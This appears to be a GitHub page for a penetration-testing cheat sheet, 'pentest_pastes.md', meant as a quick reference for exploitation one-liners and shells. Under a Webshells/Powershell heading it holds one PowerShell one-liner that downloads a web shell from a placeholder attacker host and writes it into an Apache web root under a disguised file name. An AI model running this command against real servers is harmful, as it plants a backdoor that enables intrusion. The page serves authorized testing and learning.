Skip to content

Latest commit

 

History

History
14 lines (11 loc) · 728 Bytes

pentest_pastes.md

File metadata and controls

14 lines (11 loc) · 728 Bytes

Pentest Pastes

One stop shop for all quick lookups for exploitations (one liners, diff techs, rev shells, etc)

Webshells

Powershell

  • fetch file powershell "(New-Object System.Net.WebClient).DownloadFile('http://HOST:PORT/webshell.php', 'C:\Apache24\htdocs\SOME_DIR\BLEND_ING.php')"

Resources